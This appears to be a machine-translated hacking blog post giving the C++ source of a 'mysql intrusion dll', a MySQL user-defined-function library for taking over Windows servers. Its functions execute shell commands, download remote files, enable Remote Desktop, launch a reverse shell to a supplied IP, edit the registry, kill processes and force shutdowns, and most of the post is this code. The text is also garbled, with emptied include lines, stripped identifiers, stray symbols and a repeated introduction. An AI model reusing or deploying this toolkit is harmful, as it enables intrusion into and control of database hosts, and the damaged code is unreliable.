mysql is a commonly used database system with a wide range of applications. If you get the user permissions of mysql, what if you improve it, the following idea is very advanced! But it must have a certain programming foundation!
Nowadays, system permissions are obtained through mysql online, most of the MYSQL user function interface UDF, such as my_udf.dll. There is a MixConnect function in it that will rebound the shell, but using this function will cause MYSQL to fake death. A few days ago, I used this function to rebound the shell and then disconnected due to network reasons, causing MYSQL to be disconnected. my_udf.dll is similar, but it listens to port 3306 on the server through the my_udfdoor function, and obtains the shell with nc forward connection, but its functions are a little less, so I decided to write a powerful and stable UDF myself.
MYSQL has a development package that defines its own interface, variable types, and function execution order. For example, we want to write an open3389 function, we can write it like this:
Program code
extern "C" __declspec(dllexport)my_bool open3389_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
//Calculating before the open3389 function is generally used for initialization work and is an optional function;
//Return 1 error, 0 normal
return 0;
}
extern "C" __declspec(dllexport)char *open3389(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
//The function that truly implements the function is required;
/*
Function content;
return Result;
*/
}
extern "C" __declspec(dllexport)void open3389_deinit(UDF_INIT *initid)
{
//Calculating after the open3389 function, it is generally used for memory release, optional functions;
}
The return value of the above open3389 function is of type char *. If it is a function of other types, the parameter list will be different. For details, you can see the MYSQL reference manual.
Another issue that must be considered when writing MYSQL UDF is that when the program is stable, it must withstand the test of various abnormal inputs, otherwise the MYSQL service process will be disconnected once the program errors.
Here is the UDF content I wrote, which contains 10 functions:
cmdshell Execute cmd;
downloader: downloader, download the specified file online and save it to the specified directory;
open3389 universal 3389 terminal service, which can specify ports (no need to restart if the port is not changed);
backshell bounces Shell;
ProcessView enumerates system processes;
KillProcess terminates the specified process;
regress Read Read the registry;
regwrite write the registry;
shut Shut down, log out, restart;
about Instructions and helper functions;
How to use:
Create function: create function function function function (case sensitive) returns string soname 'dll name' (note the path);
Delete function: delete function function name;
Use function: select function name (parameter list); you can use select function name ("help");
The above functions have been tested multiple times (testing platform: MYSQL 5.0.24-community-nt, Windows XP), which is unlikely to cause MYSQL to be faked, but it is not ruled out that errors occur in special environments and special inputs. If you find a bug, please notify me. QQ: 185826531 (langouster)
Program code
//-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
// MYSQL_UDF.cpp : Define the entry point of the DLL application.
#include ""
#include ""
#include <>
#include <>
#include <>
#include <>
#include <>
#include ""
#include ""
#pragma comment(lib, "")
HANDLE g_module;
//--------------------------------------------------------------------------------------------------------------------------
BOOL APIENTRY DllMain(HINSTANCE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
{
if(ul_reason_for_call==DLL_PROCESS_ATTACH)
g_module=hModule;
return TRUE;
}
//--------------------------------------------------------------------------------------------------------------------------cmdshell
extern "C" __declspec(dllexport)my_bool cmdshell_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *cmdshell(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=1 || args->arg_type[0]!=STRING_RESULT || stricmp(args->args[0],"help")==0)
{
initid->ptr=(char *)malloc(200);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"Execute CMD Shell function.\r\nExample:select cmdshell(\"dir c:\\\\\");\r\n\n\"\\\" in the parameter should be replaced by \"\\\\\\");
*length=strlen(initid->ptr);
return initid->ptr;
}
int RunStatus=0;
char *cmdline,TempFilePath[MAX_PATH],ShellPath[MAX_PATH],temp[100];
DWORD size=0,len;
HANDLE hFile;
GetSystemDirectory(ShellPath,MAX_PATH-1);
strcat(ShellPath,"\\");
GetEnvironmentVariable("temp",TempFilePath,MAX_PATH-1);
strcat(TempFilePath,"\\");
cmdline=(char *)malloc(strlen(args->args[0])+strlen(TempFilePath)+7);
strcpy(cmdline," /c ");
strcat(cmdline,(args->args)[0]);
strcat(cmdline,">");
strcat(cmdline,TempFilePath);
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
=SW_HIDE;
= sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
RunStatus=CreateProcess(ShellPath,cmdline,NULL,NULL,FALSE,0,0,0,&si,&pi);
free(cmdline);
if(!RunStatus)
{
itoa(GetLastError(),temp,10);
Sprintf(temp,"Shell cannot start, GetLastError=%s\n",temp);
initid->ptr=(char *)malloc(strlen(temp)+1);
strcpy(initid->ptr,temp);
(*length)=strlen(initid->ptr);
return initid->ptr;
}
WaitForSingleObject(,30000);
//Get the results
hFile=CreateFile(TempFilePath,GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(hFile!=INVALID_HANDLE_VALUE)
{
size=GetFileSize(hFile,NULL);
initid->ptr=(char *)malloc(size+100);
ReadFile(hFile,initid->ptr,size+1,&len,NULL);
(initid->ptr)[size]='\0';
Strcat(initid->ptr,"\r\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
CloseHandle(hFile);
DeleteFile(TempFilePath);
}
else
{
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"\r\n--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
}
(*length)=strlen(initid->ptr);
return initid->ptr;
}
extern "C" __declspec(dllexport)void cmdshell_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//---------------------------------------------------------------------------------------------------------------------------downloader
extern "C" __declspec(dllexport)my_bool downloader_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *downloader(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=2 || args->arg_type[0]!=STRING_RESULT || args->arg_type[1]!=STRING_RESULT || stricmp(args->args[0],"help")==0)
{
initid->ptr=(char *)malloc(200);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"Downloader function\r\nExample:select downloader(\"/\",\"c:\\\\\\\\\\\\ system32\\\\\");\r\n\"\\\\" in the parameter should be replaced by \"\\\\\\\");
*length=strlen(initid->ptr);
return initid->ptr;
}
HANDLE hFile;
char path[MAX_PATH];
strcpy(path,(args->args)[1]);
hFile=CreateFile(path,GENERIC_WRITE,FILE_SHARE_READ, NULL,Create_ALWAYS,0,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc(100+strlen(path));
Sprintf(initid->ptr,"File creation failed, please confirm that the directory exists and has write permissions (%s).",path);
*length=strlen(initid->ptr);
return initid->ptr;
}
CloseHandle(hFile);
DeleteFile(path);
if(URLDownloadToFile(NULL,(args->args)[0],path,0,0)==S_OK)
{
initid->ptr=(char *)malloc(50+strlen(path));
Sprintf(initid->ptr,"The file download was successful (%s).",path);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc(100+strlen((args->args)[0]));
Sprintf(initid->ptr,"An error occurred when downloading the file, which may be due to the network (%s).",(args->args)[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void downloader_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------open3389
extern "C" __declspec(dllexport)my_bool open3389_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *open3389(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(!(args->arg_count==0 ||(args->arg_count==1 && args->arg_type[0]==INT_RESULT)))
{
initid->ptr=(char *)malloc(200);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"Universal opening of 3389 terminal service. Modification of ports requires restart to take effect.\r\nExample: select open3389([port]);");
*length=strlen(initid->ptr);
return initid->ptr;
}
HRSRC hrsrc1;
HGLOBAL hglobal1;
HANDLE hFile;
char path[MAX_PATH];
DWORD size,size2;
GetEnvironmentVariable("temp",path,MAX_PATH-1);
strcat(path,"\\");
hrsrc1=FindResource((HMODULE)g_module, MAKEINTRESOURCE(IDR_BIN1), "BIN");
if(hrsrc1==NULL)
{
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"There was an error in finding the resource, open3389 cannot continue to run.");
*length=strlen(initid->ptr);
return initid->ptr;
}
size=SizeofResource((HMODULE)g_module, hrsrc1);
hglobal1=LoadResource((HMODULE)g_module, hrsrc1);
if(hglobal1==NULL)
{
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"There was an error in loading the resource, open3389 cannot continue running.");
*length=strlen(initid->ptr);
return initid->ptr;
}
hFile = CreateFile(path,GENERIC_WRITE,0, NULL,Create_ALWAYS,0,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"An error occurred creating a temporary file, open3389 cannot continue running.");
*length=strlen(initid->ptr);
return initid->ptr;
}
WriteFile(hFile,(LPVOID)LockResource(hglobal1),size+1,&size2,NULL);
CloseHandle(hFile);
GlobalFree(hglobal1);
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
=SW_HIDE;
= sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
bool RunStatus=CreateProcess(path,NULL,NULL,NULL,FALSE,0,0,0,&si,&pi);
if(!RunStatus)
{
DeleteFile(path);
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"An error occurred running the temporary file, your permissions may not be enough.");
*length=strlen(initid->ptr);
return initid->ptr;
}
WaitForSingleObject(,5000);
DeleteFile(path);
//Change the port
if(args->arg_count!=0 && args->arg_type[0]==INT_RESULT)
{
HKEY key;
DWORD dwDisposition;
DWORD port=*((long long *) args->args[0]);
RegCreateKeyEx(HKEY_LOCAL_MACHINE ,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",0,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,"PortNumber",0,REG_DWORD,(BYTE *)&port,sizeof(port)))
{
RegCloseKey(key);
RegCreateKeyEx(HKEY_LOCAL_MACHINE ,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp",0,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,"PortNumber",0,REG_DWORD,(BYTE *)&port,sizeof(port)))
{
RegCloseKey(key);
initid->ptr=(char *)malloc(100);
sprintf(initid->ptr,"Successfully opened the 3389 terminal service....\r\nSuccessfully modified the terminal service port to %d, and it takes effect after restarting. You can use the WindowsExit function to restart the system.",port);
*length=strlen(initid->ptr);
return initid->ptr;
}
}
RegCloseKey(key);
initid->ptr=(char *)malloc(100);
Sprintf(initid->ptr,"Successfully opened 3389 terminal service...\r\nModify the terminal service port failed.");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc(100);
Sprintf(initid->ptr,"Successfully opened 3389 terminal service.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void open3389_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------regread
extern "C" __declspec(dllexport)my_bool regread_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *regread(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=3 || args->arg_type[0]!=STRING_RESULT || args->arg_type[1]!=STRING_RESULT || args->arg_type[2]!=STRING_RESULT || stricmp(args->args[0],"help")==0)
{
initid->ptr=(char *)malloc(250);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"Read registry function.\r\nExample:select regread(\"HKEY_LOCAL_MACHINE\",\"SYSTEM\\\\ControlSet001\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\");\r\n\\"\\\\" in the parameter should be replaced by \"\\\\\\\");
*length=strlen(initid->ptr);
return initid->ptr;
}
DWORD a,b,c;
BYTE bytere[1000];
HKEY key,key2;
if(strcmp("HKEY_LOCAL_MACHINE",(args->args)[0])==0)
key=HKEY_LOCAL_MACHINE;
else if(strcmp("HKEY_CLASSES_ROOT",(args->args)[0])==0)
key=HKEY_CLASSES_ROOT ;
else if(strcmp("HKEY_CURRENT_USER ",(args->args)[0])==0)
key=HKEY_CURRENT_USER ;
else if(strcmp("HKEY_USERS ",(args->args)[0])==0)
key=HKEY_USERS ;
else
{
initid->ptr=(char *)malloc(50+strlen((args->args)[0]));
Sprintf(initid->ptr,"Unknown registry handle:%s\r\n",(args->args)[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}
RegCreateKeyEx(key,(args->args)[1],0,0,REG_OPTION_NON_VOLATILE,KEY_QUERY_VALUE,NULL,&key2,&b);
if(b==REG_OPENED_EXISTING_KEY)
{
if(!RegQueryValueEx(key2,(args->args)[2],0,&a,bytere,&c))
{
CloseHandle(key2);
initid->ptr=(char *)malloc(1001);
memset(initid->ptr,0,1001);
strcpy(initid->ptr,(char *)bytere);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
CloseHandle(key2);
initid->ptr=(char *)malloc(100);
strcpy(initid->ptr,"Cannot find the registry value\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
else
{
CloseHandle(key2);
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"Cannot find registry key\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void regread_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------regwrite
extern "C" __declspec(dllexport)my_bool regwrite_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *regwrite(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=5 || args->arg_type[0]!=STRING_RESULT || args->arg_type[1]!=STRING_RESULT || args->arg_type[2]!=STRING_RESULT || args->arg_type[3]!=STRING_RESULT || args->arg_type[4]!=STRING_RESULT || stricmp(args->args[0],"help")==0)
{
initid->ptr=(char *)malloc(300);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"write registry function.\r\nExample: select regwrite(\"HKEY_LOCAL_MACHINE\",\"SOFTWARE\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\");\r\n\\"\\\\\" should be replaced by \"\\\\\\\");
*length=strlen(initid->ptr);
return initid->ptr;
}
HKEY key,hkey;
DWORD dwDisposition,ktype;
if(strcmp("HKEY_LOCAL_MACHINE",(args->args)[0])==0)
hkey=HKEY_LOCAL_MACHINE;
else if(strcmp("HKEY_CLASSES_ROOT",(args->args)[0])==0)
hkey=HKEY_CLASSES_ROOT ;
else if(strcmp("HKEY_CURRENT_USER ",(args->args)[0])==0)
hkey=HKEY_CURRENT_USER ;
else if(strcmp("HKEY_USERS ",(args->args)[0])==0)
hkey=HKEY_USERS ;
else
{
initid->ptr=(char *)malloc(50+strlen((args->args)[0]));
Sprintf(initid->ptr,"Unknown registry handle:%s\r\n",(args->args)[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}
if(strcmp("REG_BINARY",(args->args)[3])==0)
ktype=REG_BINARY;
else if(strcmp("REG_DWORD",(args->args)[3])==0)
ktype=REG_DWORD ;
else if(strcmp("REG_DWORD_LITTLE_ENDIAN",(args->args)[3])==0)
ktype=REG_DWORD_LITTLE_ENDIAN ;
else if(strcmp("REG_DWORD_BIG_ENDIAN",(args->args)[3])==0)
ktype=REG_DWORD_BIG_ENDIAN ;
else if(strcmp("REG_EXPAND_SZ",(args->args)[3])==0)
ktype=REG_EXPAND_SZ ;
else if(strcmp("REG_LINK",(args->args)[3])==0)
ktype=REG_LINK ;
else if(strcmp("REG_MULTI_SZ",(args->args)[3])==0)
ktype=REG_MULTI_SZ ;
else if(strcmp("REG_NONE",(args->args)[3])==0)
ktype=REG_NONE ;
else if(strcmp("REG_RESOURCE_LIST",(args->args)[3])==0)
ktype=REG_RESOURCE_LIST ;
else if(strcmp("REG_SZ",(args->args)[3])==0)
ktype=REG_SZ ;
else
{
initid->ptr=(char *)malloc(50+strlen((args->args)[3]));
Sprintf(initid->ptr,"Unknown registry value type: %s\r\n",(args->args)[3]);
*length=strlen(initid->ptr);
return initid->ptr;
}
RegCreateKeyEx(hkey,(args->args)[1],0,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,(args->args)[2],0,ktype,(BYTE *)(args->args)[4],lstrlen((args->args)[4])+1))
{
initid->ptr=(char *)malloc(100);
Sprintf(initid->ptr,"Writing the registry successfully\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc(100);
Sprintf(initid->ptr,"Writing the registry failed, it may be that your permissions are insufficient\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
RegCloseKey(key);
}
extern "C" __declspec(dllexport)void regwrite_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------KillProcess
extern "C" __declspec(dllexport)my_bool KillProcess_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *KillProcess(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=1 || args->arg_type[0]!=STRING_RESULT || (strcmp((args->args)[0],"help")==0))
{
initid->ptr=(char *)malloc(200);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"End process function.\r\nExample:select KillProcess(\"Process name or process ID (decimal)\");\r\nThe program cannot end the system process at present.");
*length=strlen(initid->ptr);
return initid->ptr;
}
HANDLE hSnapshot = NULL;
DWORD processid=0;
HANDLE hProcess;
char ProcessName[MAX_PATH],tempchar[10];
PROCESSENTRY32 pe;
strcpy(ProcessName,(args->args)[0]);
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
= sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe);
do
{
itoa(pe.th32ProcessID,tempchar,10);
if(stricmp(,ProcessName)==0 || stricmp(tempchar,ProcessName)==0)
{
processid=pe.th32ProcessID;
break;
}
}
while(Process32Next(hSnapshot,&pe)==TRUE);
CloseHandle(hSnapshot);
if(processid==0)
{
initid->ptr=(char *)malloc(100);
Sprintf(initid->ptr,"Process %s cannot be found, please confirm whether the process exists!",(args->args)[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}
hProcess=OpenProcess(PROCESS_TERMINATE,false,processid);
if(TerminateProcess(hProcess,0))
{
CloseHandle(hProcess);
initid->ptr=(char *)malloc(100);
Sprintf(initid->ptr,"%s process terminated successfully.",(args->args)[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
CloseHandle(hProcess);
initid->ptr=(char *)malloc(100);
Sprintf(initid->ptr,"%s process termination failed, your permissions may be insufficient.",(args->args)[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void KillProcess_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------ProcessView
extern "C" __declspec(dllexport)my_bool ProcessView_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *ProcessView(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=0)
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"Enum process functions.\r\nExample:select ProcessView();");
*length=strlen(initid->ptr);
return initid->ptr;
}
HANDLE hSnapshot = NULL;
DWORD processid=0;
PROCESSENTRY32 pe;
char tempchar[10];
initid->ptr=(char *)malloc(2000);
if(initid->ptr==NULL)return NULL;
memset(initid->ptr,0,1000);
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
= sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe);
do
{
strcat(initid->ptr,);
strcat(initid->ptr,"\t");
itoa(pe.th32ProcessID,tempchar,10);
strcat(initid->ptr,tempchar);
strcat(initid->ptr,"\r\n");
}
while(Process32Next(hSnapshot,&pe)==TRUE);
CloseHandle(hSnapshot);
*length=strlen(initid->ptr);
return initid->ptr;
}
extern "C" __declspec(dllexport)void ProcessView_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------WindowsExit
extern "C" __declspec(dllexport)my_bool shut_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *shut(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=1 || args->arg_type[0]!=STRING_RESULT || stricmp(args->args[0],"help")==0)
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"Shutdown-restart logout function.\r\nExample:select shut(\"logoff|shutdown|reboot\");");
*length=strlen(initid->ptr);
return initid->ptr;
}
HANDLE hToken;
TOKEN_PRIVILEGES token;
UINT Flag;
if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken))
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"An error occurred to obtain process access signaling, your permissions may be insufficient.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
= 1;
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &[0].Luid);
[0].Attributes=SE_PRIVILEGE_ENABLED;
if(!AdjustTokenPrivileges(hToken,0,&token, sizeof(token),0,0))
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"An error occurred to obtain the shutdown token, your permissions may be insufficient.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
if(stricmp(args->args[0],"logoff")==0)
Flag=EWX_LOGOFF|EWX_FORCE;
else if(stricmp(args->args[0],"shutdown")==0)
Flag=EWX_SHUTDOWN|EWX_FORCE;
else if(stricmp(args->args[0],"reboot")==0)
Flag=EWX_REBOOT|EWX_FORCE;
else
{
initid->ptr=(char *)malloc(100+strlen(args->args[0]));
if(initid->ptr==NULL)return NULL;
Sprintf(initid->ptr,"Unknown parameter %s, expected to be one of logoff, shutdown, and reboot.\r\n",args->args[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}
if(ExitWindowsEx(Flag,0))
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
Sprintf(initid->ptr,"Execute successfully.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
Sprintf(initid->ptr,"Execution failed, your permissions may be insufficient.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void shut_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------BackShell
extern "C" __declspec(dllexport)my_bool backshell_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *backshell(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=2 || args->arg_type[0]!=STRING_RESULT || args->arg_type[1]!=INT_RESULT || stricmp(args->args[0],"help")==0)
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"Bounce shell.\r\nExample:select backshell(\"your IP\",your port);");
*length=strlen(initid->ptr);
return initid->ptr;
}
HRSRC hrsrc1;
HGLOBAL hglobal1;
HANDLE hFile;
char path[MAX_PATH],cmd[400];
DWORD size,size2;
GetEnvironmentVariable("temp",path,MAX_PATH-1);
strcat(path,"\\");
hrsrc1=FindResource((HMODULE)g_module, MAKEINTRESOURCE(IDR_BIN2), "BIN");
if(hrsrc1==NULL)
{
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"There was an error in finding the resource, and the backshell could not continue to run.");
*length=strlen(initid->ptr);
return initid->ptr;
}
size=SizeofResource((HMODULE)g_module, hrsrc1);
hglobal1=LoadResource((HMODULE)g_module, hrsrc1);
if(hglobal1==NULL)
{
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"There was an error in loading the resource, and the backshell could not continue to run.");
*length=strlen(initid->ptr);
return initid->ptr;
}
hFile = CreateFile(path,GENERIC_WRITE,0, NULL,Create_ALWAYS,0,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"An error occurred creating a temporary file, backshell could not continue to run.");
*length=strlen(initid->ptr);
return initid->ptr;
}
WriteFile(hFile,(LPVOID)LockResource(hglobal1),size+1,&size2,NULL);
CloseHandle(hFile);
GlobalFree(hglobal1);
strcpy(cmd,path);
GetSystemDirectory(path,MAX_PATH-1);
strcat(path,"\\");
sprintf(cmd,"%s -e %s %s %d",cmd,path,args->args[0],*((long long *) args->args[1]));
if(WinExec(cmd,SW_HIDE)>31)
{
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"Execution successful\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"Execution failed\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void backshell_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------about
extern "C" __declspec(dllexport)my_bool about_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *about(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
initid->ptr=(char *)malloc(2000);
if(initid->ptr==NULL)return NULL;
memset(initid->ptr,0,2000);
strcat(initid->ptr,"mysql intrusion dll version 1.0.0.1\r\n\r\n");
strcat(initid->ptr,"Note: To use this dll, you must have insert and delete permissions to mysql to create and delete functions.\r\n\r\n");
¥Strcat(initid->ptr,"Usage method:\r\n");
¥Strcat(initid->ptr,"Create function: create function function function (case sensitive) returns string soname \"dll name\" (note the path);\r\n");
¥Strcat(initid->ptr,"Delete function: delete function function function;\r\n");
¥Strcat(initid->ptr,"Use function:select function name (parameter list); use select function name (\"help\");\r\n");
strcat(initid->ptr,"--------------------------------------------------------------------\r\n");
¥Strcat(initid->ptr,"The function contained in this dll:\r\n");
¥Strcat(initid->ptr,"cmdshell execute cmd;\r\n");
¥Strcat(initid->ptr,"downloader Downloader, download the specified file online and save it to the specified directory;\r\n");
¥Strcat(initid->ptr,"open3389 Universal 3389 terminal service, can specify ports (no need to restart if the port is not changed);\r\n");
¥Strcat(initid->ptr,"backshell Backshell;\r\n");
¥Strcat(initid->ptr,"ProcessView enumer system processes;\r\n");
¥Strcat(initid->ptr,"KillProcess terminates the specified process;\r\n");
¥Strcat(initid->ptr,"regread read the registry;\r\n");
¥Strcat(initid->ptr,"regwrite write registry;\r\n");
¥Strcat(initid->ptr,"shut shut shut, log out, restart;\r\n");
¥Strcat(initid->ptr,"about This function;\r\n");
strcat(initid->ptr,"--------------------------------------------------------------------\r\n");
¥Strcat(initid->ptr,"Each function in DLL has been tested multiple times, which is unlikely to cause MYSQL to be faked, but the possibility of errors in special environments and special inputs is not ruled out.\r\n");
Strcat(initid->ptr,"If you find bugs during use, please contact me QQ: 185826531(langouster)\r\n");
¥Strcat(initid->ptr,"The source program is public, and functions can be modified and added at will. Please indicate the original author of the source program.\r\n\r\n");
Strcat(initid->ptr,"Special statement: This program is for technical research only, and the author is not responsible for the consequences caused by improper use of the program!");
*length=strlen(initid->ptr);
return initid->ptr;
}
extern "C" __declspec(dllexport)void about_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
Nowadays, system permissions are obtained through mysql online, most of the MYSQL user function interface UDF, such as my_udf.dll. There is a MixConnect function in it that will rebound the shell, but using this function will cause MYSQL to fake death. A few days ago, I used this function to rebound the shell and then disconnected due to network reasons, causing MYSQL to be disconnected. my_udf.dll is similar, but it listens to port 3306 on the server through the my_udfdoor function, and obtains the shell with nc forward connection, but its functions are a little less, so I decided to write a powerful and stable UDF myself.
MYSQL has a development package that defines its own interface, variable types, and function execution order. For example, we want to write an open3389 function, we can write it like this:
Program code
extern "C" __declspec(dllexport)my_bool open3389_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
//Calculating before the open3389 function is generally used for initialization work and is an optional function;
//Return 1 error, 0 normal
return 0;
}
